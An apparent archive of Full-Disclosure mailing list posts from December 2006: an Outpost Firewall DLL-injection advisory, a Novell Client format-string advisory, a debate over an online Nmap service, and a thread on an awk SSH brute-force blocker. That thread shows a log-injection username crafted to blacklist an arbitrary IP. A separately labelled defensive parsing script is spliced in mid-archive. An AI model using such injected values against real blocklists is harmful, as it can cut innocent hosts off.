A B O U T   T H E   A U T H O R /
================================='

Tim Weber, computer science student at the University of Mannheim, Germany, currently looking for an internship at some IT security or pentesting company, can be reached via e-mail: scy-adv-061124b at the host scytale.de.

T H A N K S /
============='

 o Kallista
 o the cat in the fridge
 o KHexEditor
 o the DZCP authors for the fun in secure.php

From david at matousec.com Fri Dec 1 10:12:30 2006
From: david at matousec.com (David Matousek)
Date: Fri, 01 Dec 2006 11:12:30 +0100
Subject: [Full-disclosure] Outpost Bypassing Self-Protection via Advanced DLL injection with handle stealing Vulnerability
Message-ID: <4570000E.8040903@matousec.com>

Hello,

We would like to inform you about a vulnerability in Outpost Firewall PRO 4.0.

Description:

The system process services.exe cares about system services. It runs them during the system boot and thus owns full access handles to all system services. Outpost protects all processes against common DLL injection and forbids other processes to manipulate its own service process. However, it does not protect services.exe against Advanced DLL injection that does not rely on writing into the target process memory. It is possible to infect services.exe with a malicious DLL and execute an arbitrary code in this system process. It is also possible to find and use its handle of the outpost.exe process to infect Outpost service process similarly.
As a result, the attacker is able to inject an arbitrary code into the Outpost's process and thus bypass any of its security mechanisms. Vulnerable software: * Outpost Firewall PRO 4.0 (971.584.079) * Outpost Firewall PRO 4.0 (964.582.059) * probably all older versions of Outpost Firewall PRO 4.0 * possibly older versions of Outpost Firewall PRO More details and a proof of concept including its source code are available here: http://www.matousec.com/info/advisories/Outpost-Bypassing-Self-Protection-via-Advanced-DLL-injection-with-handle-stealing.php Regards, -- Matousec - Transparent security Research http://www.matousec.com/ From dudevanwinkle at gmail.com Fri Dec 1 11:48:38 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 06:48:38 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: On 12/1/06, Mike Huber wrote: > first of all, IANAL, but the TOS seem to cover the basics... > None-the-less, my 8-ball sees litigation in their future. portscanning isnt illegal in the states -JP From tonnerre.lombard at sygroup.ch Fri Dec 1 12:17:26 2006 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Fri, 01 Dec 2006 13:17:26 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701925.7060503@infiltrated.net> References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> Message-ID: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> Salut, On Fri, 2006-12-01 at 06:59 -0500, J. 
Oquendo wrote:
> >> Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
> >> awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}'
> >
> > What if I set my user name to "bikermice from mars"? Are you going to
> > blacklist mars then?
>
> Apparently you are as stupid as your question is. The syntax won't allow
> to pass off anything. Try it before responding idiotically

Did you even try it? And what exactly in this awk statement would prevent me from inserting mars in this case?

The log statement would look like this:

Nov 27 16:31:21 local sshd[67010]: Illegal user bikermice from mars from 213.134.128.227

In this case, your awk statement checks that argument $6 is "Illegal" (which it is) and argument $9 is "from" (which it is). So it takes $10 and prints it (in this case, mars.)

If you check $10 to look like an IP address, I set my username to "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 because it is a valid IP.

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL
Web:www.sygroup.ch      tonnerre.lombard at sygroup.ch
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 825 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/56baf100/attachment.bin

From sil at infiltrated.net Fri Dec 1 12:26:01 2006
From: sil at infiltrated.net (J.
Oquendo)
Date: Fri, 01 Dec 2006 07:26:01 -0500
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <1164975446.39297.41.camel@aspirateur.sygroup-int.ch>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch>
Message-ID: <45701F59.4050502@infiltrated.net>

Tonnerre Lombard wrote:
> In this case, your awk statement checks that argument $6 is
> "Illegal" (which it is) and argument $9 is "from" (which it is). So it
> takes $10 and prints it (in this case, mars.)
>
> If you check $10 to look like an IP address, I set my username to
> "bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1
> because it is a valid IP.
>
> Tonnerre
>

So again... Some of you guys need to go back and read before you post....

awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}'

Once you try a moronic name insertion it makes the columns more than 10 rows invalidating it. Is this a difficult concept to understand? Set your host to whatever you would like, it's been discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script to ensure no one ever spoofs again.

--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5157 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/9c87af00/attachment.bin

From tonnerre.lombard at sygroup.ch Fri Dec 1 12:44:22 2006
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Fri, 01 Dec 2006 13:44:22 +0100
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <45701F59.4050502@infiltrated.net>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net>
Message-ID: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch>

Salut,

On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote:
> So again... Some of you guys need to go back and read before you post....

In this case, the NF wasn't in your original posting, so I could hardly have seen it. Still, there are problems with it, but not security wise...

> awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}'
>
> Once you try a moronic name insertion it makes the columns more than 10
> rows invalidating it.

In that case, your script isn't going to work in most cases. For example, on our router we get:

Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user asdf from 10.1.5.166 port 51558 ssh2

-> more than 10 columns.

Also, one of our customers uses user names which consist of two parts which are separated by spaces. This is due to his use of Windows. The users are called e.g. "John Doe", so you do an ssh "John Doe at servername.asdf.ch".
In this case, your script fails entirely.

Probably a top-down parser isn't really suitable for this. If at all, you should make an attempt to parse from the end of the string. sed can help you there.

> Perhaps I should re-write TCP into the script to ensure no one ever
> spoofs again.

That wouldn't be very useful since the L4Addr doesn't matter much here, as we're dealing with L3addrs...

Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL
Web:www.sygroup.ch      tonnerre.lombard at sygroup.ch
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 825 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/abb811a3/attachment.bin

From sil at infiltrated.net Fri Dec 1 12:50:14 2006
From: sil at infiltrated.net (J. Oquendo)
Date: Fri, 01 Dec 2006 07:50:14 -0500
Subject: [Full-disclosure] SSH brute force blocking tool
In-Reply-To: <1164977062.39297.49.camel@aspirateur.sygroup-int.ch>
References: <456B3AE2.9070708@infiltrated.net> <20061127203433.GC6620@sdf.lonestar.org> <1638869788.20061128152124@Zoller.lu> <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <1164977062.39297.49.camel@aspirateur.sygroup-int.ch>
Message-ID: <45702506.4070300@infiltrated.net>

Tonnerre Lombard wrote:
> Salut,
>
> On Fri, 2006-12-01 at 07:26 -0500, J. Oquendo wrote:
>
>> So again... Some of you guys need to go back and read before you post....
>>
>
> In this case, the NF wasn't in your original posting, so I could hardly
> have seen it. Still, there are problems with it, but not security
> wise...
>
>
>> awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}'
>>
>> Once you try a moronic name insertion it makes the columns more than 10
>> rows invalidating it.
>>
>
> In that case, your script isn't going to work in most cases. For
> example, on our router we get:
>
> Dec 1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user
> asdf from 10.1.5.166 port 51558 ssh2
>
> -> more than 10 columns.
>
>

And this is my problem how? The script was written mainly for myself and was passed on as something someone can use at their leisure and expense. "Your script isn't going to work boohoo" Is it not customizable to fit your need. I would think so all it is doing is text processing no brainer there.

> Also, one of our customers uses user names which consist of two parts
> which are separated by spaces. This is due to his use of Windows. The
> users are called e.g. "John Doe", so you do an ssh "John
> Doe at servername.asdf.ch". In this case, your script fails entirely
>

Again... Re-read my previous paragraph.

--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams
-------------- next part --------------
A non-text attachment was scrubbed...
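
Added example (not part of any message in this thread, and not J. Oquendo's script): one way to act on the suggestion above to parse from the end of the line. sshd writes "from <address>" after the user name, so the address is located by counting back from the last field, and text placed in the user name cannot move it. The names extract_offenders and sample_log are hypothetical, the sample lines are constructed from the formats quoted in the thread, and one log record per line is assumed.

```shell
#!/bin/sh
# Added example: pull the source address out of failed-login lines from sshd
# by reading each line from its END. Everything between the failure phrase
# and the trailing "from <ip>" is treated as user name, whatever it contains.

# extract_offenders: syslog lines on stdin, one IPv4 address per match on stdout.
extract_offenders() {
    awk '
    # Accept only a dotted quad whose four parts are numbers from 0 to 255.
    function is_ipv4(s,    n, parts, i) {
        n = split(s, parts, ".")
        if (n != 4) return 0
        for (i = 1; i <= 4; i++) {
            if (parts[i] !~ /^[0-9]+$/ || length(parts[i]) > 3) return 0
            if (parts[i] + 0 > 255) return 0
        }
        return 1
    }
    {
        # Fields 1-5 (date, time, host, "sshd[pid]:") come from syslog,
        # not from the remote side.
        if ($5 !~ /^sshd\[[0-9]+\]:$/) next

        # The message has to BEGIN with a known failure phrase; name_start
        # is the first field that belongs to the user name.
        if (($6 == "Illegal" || $6 == "Invalid") && $7 == "user")
            name_start = 8
        else if ($6 == "Failed" && $7 == "password" && $8 == "for" &&
                 $9 == "invalid" && $10 == "user")
            name_start = 11
        else
            next

        # sshd appends either "from <ip>" or "from <ip> port <n> ssh2"
        # after the name, so find the address by counting back from NF.
        ip_field = NF
        if ($NF == "ssh2" && $(NF - 2) == "port" && $(NF - 1) ~ /^[0-9]+$/)
            ip_field = NF - 3

        # The "from" keyword must sit at or after the start of the name
        # (an empty name is allowed) and directly before the address.
        if (ip_field - 1 < name_start) next
        if ($(ip_field - 1) != "from") next
        if (!is_ipv4($ip_field)) next

        print $ip_field
    }'
}

# sample_log: constructed input. Lines 1, 2 and 4 follow log lines quoted in
# the thread; the others are made up to cover the cases that were raised
# (address inside the name, name with a space, non-failure line, bad address).
sample_log() {
    cat <<'EOF'
Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227
Nov 27 16:31:21 local sshd[67010]: Illegal user bikermice from mars from 213.134.128.227
Nov 27 16:31:21 local sshd[67010]: Illegal user bikermice from 217.14.64.1 from 213.134.128.227
Dec  1 13:35:24 rtsyg01 sshd[12178]: Failed password for invalid user asdf from 10.1.5.166 port 51558 ssh2
Dec  1 13:35:24 rtsyg01 sshd[12178]: Invalid user John Doe from 10.1.5.166
Dec  1 13:35:24 rtsyg01 sshd[12178]: Accepted password for root from 10.1.5.9 port 51559 ssh2
Dec  1 13:35:24 rtsyg01 sshd[12178]: Illegal user x from 999.1.1.1
EOF
}

# Stand-alone run: unique offending addresses from the sample input.
sample_log | extract_offenders | sort -u
```

The address printed for the "bikermice from 217.14.64.1" line is the connecting host, not the one typed into the user name, and the line count no longer matters, so the "Failed password for invalid user" format and names containing spaces are handled by the same rule.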
Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/5b111b85/attachment.bin From jammer128 at gmail.com Fri Dec 1 12:56:43 2006 From: jammer128 at gmail.com (Jason Miller) Date: Fri, 1 Dec 2006 06:56:43 -0600 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> I agree with Dave on this one. Dude Van, I thought it was illegal in the states..? Or am I mistaken? Also, think of this from the ISP's view, do they really want a service port scanning their users? And look at it this way, said target has a proxy server on it, attacker proxies into the proxy and scans the target server with that service, since he is now on the targets IP address, I think you understand what I'm getting at by now. nmap is made to find exploits, that is what this service is going to wind up being abused for (in most cases that i know). On 12/1/06, Dave Moore wrote: > > On 12/1/06, Mike Huber wrote: > > first of all, IANAL, but the TOS seem to cover the basics... However, I > am > > unsure whether they would hold up under strict legal scrutiny. As far > as I > > can tell, they may hold up under US criminal law, but not under civil > law, > > as tort law has its own wonderful little eccentricities. The best > safeguard > > they seem to have is that they must log the source IP of all scan > > requests... As far as I know, anyone who takes the time to read the > nmap > > man page should be able to craft a scan which won't be detected by the > > scanned host (can someone be a definitive source on this point?), and > anyone > > taking malicious action ought to be taking sufficient precautions to > avoid > > detection anyway. None-the-less, my 8-ball sees litigation in their > future. 
> > All nmap scans are detectable. All port scans are detectable. Just > depends on how hard you're looking. > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/34197a40/attachment.html From ltr at isc.upenn.edu Fri Dec 1 13:50:48 2006 From: ltr at isc.upenn.edu (David Taylor) Date: Fri, 1 Dec 2006 08:50:48 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <456BF10D.9080400@matousec.com> Message-ID: <01af01c7154f$b518a780$654b5b82@shakuhachi> How do you plan on dealing with all the abuse complaints you get hit with when people use your server to perform unauthorized scans of their networks? ================================================== David Taylor //Sr. Information Security Specialist University of Pennsylvania Information Security Philadelphia PA USA (215) 898-1236 http://www.upenn.edu/computing/security/ ================================================== Shadowserver Foundation Member http://www.shadowserver.org/ -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David Matousek Sent: Tuesday, November 28, 2006 3:19 AM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Nmap Online Hello, For all Nmap fans, our group have implemented Nmap Online service. Its address is http://nmap-online.com/. The interface allows you to perform custom Nmap scans from our server with only a few limitations in the syntax. The service is free and can be used immediately, no registration is required. Please direct your questions and suggestions to our emails. Regards, -- David Matousek Founder and Chief Representative of Matousec - Transparent security http://www.matousec.com/ _______________________________________________ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From falco at gentoo.org Fri Dec 1 14:02:26 2006 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 1 Dec 2006 15:02:26 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <45701F59.4050502@infiltrated.net> References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> Message-ID: <20061201140226.GC26621@falco.falcal.net> On Fri, 01 Dec 2006, J. Oquendo wrote: > Tonnerre Lombard wrote: > > > >In this case, your awk statement checks that argument $6 is > >"Illegal" (which it is) and argument $9 is "from" (which it is). So it > >takes $10 and prints it (in this case, mars.) > > > >If you check $10 to look like an IP address, I set my username to > >"bikermice from 217.14.64.1", you're going to blacklist 217.14.64.1 > >because it is a valid IP. > > > > Tonnerre > > > > So again... Some of you guys need to go back and read before you post.... ok, you're right, let's go back and let's read again: You mention (from the attached mail, you've written): Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' Note that there is no "NF" in this line. > > awk 'NF<=10&&($6=="nvalid"||$7=="user")&&$9=="from"{print $10}' > you're fixing your script when someone shows a security hole, that's a good practice. But don't insult the men who mention the vulnerabilities... They are actually helping you, because you're improving your script thanks to them. 
> > Once you try a moronic name insertion it makes the columns more than 10 rows invalidating it. > Is this a difficult concept to understand? Set your host to whatever you would like, its been > discussed and resolved. Is there anything else? Perhaps I should re-write TCP into the script > to ensure no one ever spoofs again. > -- Rapha?l Marichez aka Falco -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/94a90342/attachment.bin From falco at gentoo.org Fri Dec 1 14:04:59 2006 From: falco at gentoo.org (Raphael Marichez) Date: Fri, 1 Dec 2006 15:04:59 +0100 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <20061201140226.GC26621@falco.falcal.net> References: <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net> Message-ID: <20061201140459.GD26621@falco.falcal.net> On Fri, 01 Dec 2006, Raphael Marichez wrote: > You mention (from the attached mail, you've written): sorry, here's your email -- Rapha?l Marichez aka Falco -------------- next part -------------- An embedded message was scrubbed... From: "J. Oquendo" Subject: Re: [Full-disclosure] SSH brute force blocking tool Date: Tue, 28 Nov 2006 11:59:43 -0500 Size: 15396 Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/fa59657f/attachment.mht -------------- next part -------------- A non-text attachment was scrubbed... 
Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/fa59657f/attachment.bin From dudevanwinkle at gmail.com Fri Dec 1 14:09:25 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 09:09:25 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> Message-ID: On 12/1/06, Jason Miller wrote: > I agree with Dave on this one. Dude Van, I thought it was illegal in the > states..? Or am I mistaken? http://www.securityfocus.com/news/126 > Also, think of this from the ISP's view, do they > really want a service port scanning their users? And look at it this way, > said target has a proxy server on it, attacker proxies into the proxy and > scans the target server with that service, since he is now on the targets IP > address, I think you understand what I'm getting at by now. nmap is made to > find exploits, that is what this service is going to wind up being abused > for (in most cases that i know). nmap is used to find open ports and fingerprint OS's. What you do with that info is up to you. Here is an example of what is legal vs what isnt: If you scan a machine with nmap from one machine, that is not illegal. If you run 100,00 nmap scans from a distributed botnet and take down their server, thats illegal. If your nmap scan tells you that port 80 is open and you run a nessus scan and find that they are vulnerable to a bug in their webserver is that illegal? I do know If you exploit that weakness and backdoor their machine, you just broke the law, but am unsure about nessus's legality on systems you dont have a get out of jail free card for or own. I have no doubt about nmap though. 
as long as you dont take down their servers with the scans, you are legit. -JP From sil at infiltrated.net Fri Dec 1 14:09:25 2006 From: sil at infiltrated.net (J. Oquendo) Date: Fri, 01 Dec 2006 09:09:25 -0500 Subject: [Full-disclosure] SSH brute force blocking tool In-Reply-To: <20061201140226.GC26621@falco.falcal.net> References: <456C489F.4020105@infiltrated.net> <20061128154219.GA31705@sdf.lonestar.org> <456C5C31.4000002@infiltrated.net> <20061128160236.GB31705@sdf.lonestar.org> <20061128161621.GC31705@sdf.lonestar.org> <456C6AFF.3060004@infiltrated.net> <1164959233.39297.35.camel@aspirateur.sygroup-int.ch> <45701925.7060503@infiltrated.net> <1164975446.39297.41.camel@aspirateur.sygroup-int.ch> <45701F59.4050502@infiltrated.net> <20061201140226.GC26621@falco.falcal.net> Message-ID: <45703795.4070002@infiltrated.net> Raphael Marichez wrote: > you're fixing your script when someone shows a security hole, that's a > good practice. But don't insult the men who mention the > vulnerabilities... They are actually helping you, because you're improving > your script thanks to them. > Hello... Some of you guys seriously need to do some reading and refreshing of your browsers... The script was fixed days ago. http://lists.grok.org.uk/pipermail/full-disclosure/2006-November/050952.html // SNIPPED Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 awk '($5=="Illegal"||$6=="Illegal")&&$9=="from"{print $10}' Would stop the insertion attack and only print out the tench field if fields 5, 6 and 9 match Illegal user from. So that would pretty much minimize the attack on name insertion. If I wanted to I could also make sure that if someone came after field 10, then ignore the entire line: Nov 27 16:31:21 local sshd[67010]: Illegal user dd from 213.134.128.227 ... SO let me restate. I could modify it to look at lines 5, 6, and 9 ... Take a look at the tenth column and if anything comes after that...Ignore that entire line... Should I have done so, maybe... 
Will I do so... Maybe... // END SNIP And I fixed it the same day to avoid the insertion of moronic usernames. Read the entire thread. My critiques comes from people who only snip out what is suitable for them to read. -- ==================================================== J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5157 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/a194f5ee/attachment.bin From juha-matti.laurio at netti.fi Fri Dec 1 14:34:06 2006 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Fri, 1 Dec 2006 16:34:06 +0200 (EET) Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi> >From the Reuters article: "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said." Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. More at http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8 SANS Internet Storm Center (ISC) has issued the following Diary entries, several references included: >From ISC director Marcus H. 
Sachs: http://isc.sans.org/diary.php?storyid=1900 and "US DHS banking alert" entry released earlier by Johannes Ullrich: http://isc.sans.org/diary.php?storyid=1899 - Juha-Matti From colweb at gmail.com Fri Dec 1 12:48:54 2006 From: colweb at gmail.com (Col) Date: Fri, 1 Dec 2006 12:48:54 +0000 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> "Service unavailable. Please try again later." That was quick! Col. From dswafford at alterhighschool.org Fri Dec 1 14:40:59 2006 From: dswafford at alterhighschool.org (David Swafford) Date: Fri, 01 Dec 2006 09:40:59 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> Message-ID: <456FF8AA.9B1E.0073.0@alterhighschool.org> Maybe it got hacked? ...I wonder if someone probably didn't like all the portscans they got from it (....thinks of Microsoft) and took it out? David. >>> Col 12/1/2006 7:48 am >>> "Service unavailable. Please try again later." That was quick! Col. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ______________________________________________________ Founded in Faith - Preserved with Pride - Sustained by Spirit ______________________________________________________ -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/6cb97b56/attachment.html

From dh at layereddefense.com Fri Dec 1 10:55:55 2006
From: dh at layereddefense.com (Deral Heiland)
Date: Fri, 01 Dec 2006 05:55:55 -0500
Subject: [Full-disclosure] Layered Defense Advisory: Novell Client 4.91 Format String Vulnerability
In-Reply-To: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net>
References: <7.0.1.0.0.20061001180650.021ff140@sbcglobal.net>
Message-ID: <7.0.1.0.0.20061201055132.027c4de0@layereddefense.com>

==================================================
Layered Defense Advisory 1 December 2006
==================================================
1) Affected Software
Novell Client 4.91 SP2
Novell Client 4.91 SP2 Patch Kit
Novell Client 4.91 SP3
Earlier versions may also be vulnerable
==================================================
2) Severity
Rating: Low - Medium risk
Impact: Read arbitrary memory, denial of service.
==================================================
3) Description of Vulnerability
A format string vulnerability was discovered within Novell client 4.91. The vulnerability is due to improper processing of format strings within NMAS (Novell Modular Authentication Services) Information message window. An attacker who enters specially crafted format strings in the Username field at the Novell logon and selects Sequences under the NMAS tab can read data from the winlogon process stack or read from arbitrary memory, and at a minimum cause a denial of service.
==================================================
4) Solution
Fix: Presently no patch is available.
Work around: Disable NMAS Authentication
==================================================
5) Time Table:
07/15/2006 Reported Vulnerability to Vendor.
08/21/2006 Vendor released Novell Client - 4.91 SP2 Patch Kit which made the vulnerability worse.
(This patch made it easier to read arbitrary memory)
09/17/2006 Contacted Vendor about increased risk with SP2 Patch Kit
11/28/2006 Received the following message from Vendor :

At this point in time, development has determined this is a very low priority and apparently it will be some time before the issue is addressed. I have reported this to our Security Review Board so development's claim can be re-examined. As such, you certainly have every right to publish your findings at this time. The bug will remain open against the product. Hopefully this can be fixed in the near future
==================================================
6) Credits
Discovered by Deral Heiland, www.LayeredDefense.com
==================================================
7) About Layered Defense
Layered Defense is a group of security professionals that work together on ethical Research, Testing and Training within the information security arena.
http://www.layereddefense.com
==================================================

From david at matousec.com Fri Dec 1 14:02:13 2006
From: david at matousec.com (David Matousek)
Date: Fri, 01 Dec 2006 15:02:13 +0100
Subject: [Full-disclosure] Nmap Online
In-Reply-To: <01af01c7154f$b518a780$654b5b82@shakuhachi>
References: <01af01c7154f$b518a780$654b5b82@shakuhachi>
Message-ID: <457035E5.8090405@matousec.com>

We have set limits to prevent abusing of our service. Yes, one can still scan someone else's network, this is in violation with our Terms of Service. We log every attempt and we are ready to provide these logs to authorities. However, everyone who has Internet access is able to download Nmap and do a similar scan. You can do nothing more with our service. There is no damage you can cause with our service even if it is abused. We believe that pros are more than cons here, that people will use our service to fix their issues on their firewalls and networks.

--
David Matousek

Founder and Chief Representative of Matousec - Transparent security
http://www.matousec.com/

David Taylor wrote:
> How do you plan on dealing with all the abuse complaints you get hit with
> when people use your server to perform unauthorized scans of their networks?
>
> ==================================================
> David Taylor //Sr. Information Security Specialist
> University of Pennsylvania Information Security
> Philadelphia PA USA
> (215) 898-1236
> http://www.upenn.edu/computing/security/
> ==================================================
>
> Shadowserver Foundation Member
> http://www.shadowserver.org/
>
> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of David
> Matousek
> Sent: Tuesday, November 28, 2006 3:19 AM
> To: full-disclosure at lists.grok.org.uk
> Subject: [Full-disclosure] Nmap Online
>
> Hello,
>
